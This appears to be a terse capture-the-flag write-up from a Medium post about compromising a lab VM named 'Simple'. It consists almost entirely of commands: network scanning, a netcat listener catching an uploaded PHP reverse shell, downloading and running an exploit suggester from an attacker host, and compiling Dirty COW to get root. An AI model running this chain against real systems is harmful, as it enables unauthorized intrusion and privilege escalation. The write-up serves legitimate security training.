Simple CTF Write-Up

Introduction

Initial Setup

Getting Started

$ arp-scan -I [interface] -l
$ nmap -T5 192.168.56.104 $ nmap -sS -sV -A -O 192.168.56.104
$ dirb http://192.168.56.104

Finding Exploits

$ searchsploit cutenews
$nc -nlvp 4445
http://192.168.56.104/uploads/avatar_hacker_php-reverse-shell.php

Privilege Escalation

$ service apache2 start
$ cd /var/www/html
$ wget https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh
$ wget 192.168.56.106/linux-exploit-suggester.sh
$ chmod 777 linux-exploit-suggester.sh; ./linux-exploit-suggester.sh

Root Compromise

$wget https://www.exploit-db.com/download/40847
$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtyc0w2.cc -lutil
root@simple:~# cat flag.txt cat flag.txt U wyn teh Interwebs!!1eleven11!!1! Hack the planet! "

--

--

🎓 M.A. Candidate @GeorgetownCSS Tech/Security/Eastern Europe | Adversary Simulation and Penetration Testing @Deloitte | 🥍 @PennStateMLax Alum

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tyler Butler

🎓 M.A. Candidate @GeorgetownCSS Tech/Security/Eastern Europe | Adversary Simulation and Penetration Testing @Deloitte | 🥍 @PennStateMLax Alum